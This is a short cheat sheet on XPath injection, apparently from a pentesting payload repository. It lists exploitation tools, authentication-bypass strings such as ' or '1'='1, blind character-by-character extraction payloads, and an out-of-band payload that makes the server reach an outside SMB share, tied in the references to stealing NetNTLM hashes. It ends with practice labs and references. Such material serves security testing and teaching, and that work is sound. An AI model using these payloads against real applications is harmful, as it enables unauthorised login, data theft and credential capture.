XPATH Injection

XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.

Summary

• Tools

• Methodology

  • Blind Exploitation

  • Out Of Band Exploitation

• Labs

• References

Tools

• orf/xcat - Automate XPath injection attacks to retrieve documents

• feakk/xxxpwn - Advanced XPath Injection Tool

• aayla-secura/xxxpwn_smart - A fork of xxxpwn using predictive text

• micsoftvn/xpath-blind-explorer

• Harshal35/XmlChor - Xpath injection exploitation tool

Methodology

Similar to SQL injection, you want to terminate the query properly:

string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())

' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
')] | //user/*[contains(*,'
') and contains(../password,'c
') and starts-with(../password,'c

Blind Exploitation

1. Size of a string

   and string-length(account)=SIZE_INT

2. Access a character with substring, and verify its value the codepoints-to-string function

   substring(//user[userid=5]/username,2,1)=CHAR_HERE
   substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

Out Of Band Exploitation

http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')

Labs

• Root Me - XPath injection - Authentication

• Root Me - XPath injection - String

• Root Me - XPath injection - Blind

References

• Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017

• XPATH Injection - OWASP - January 21, 2015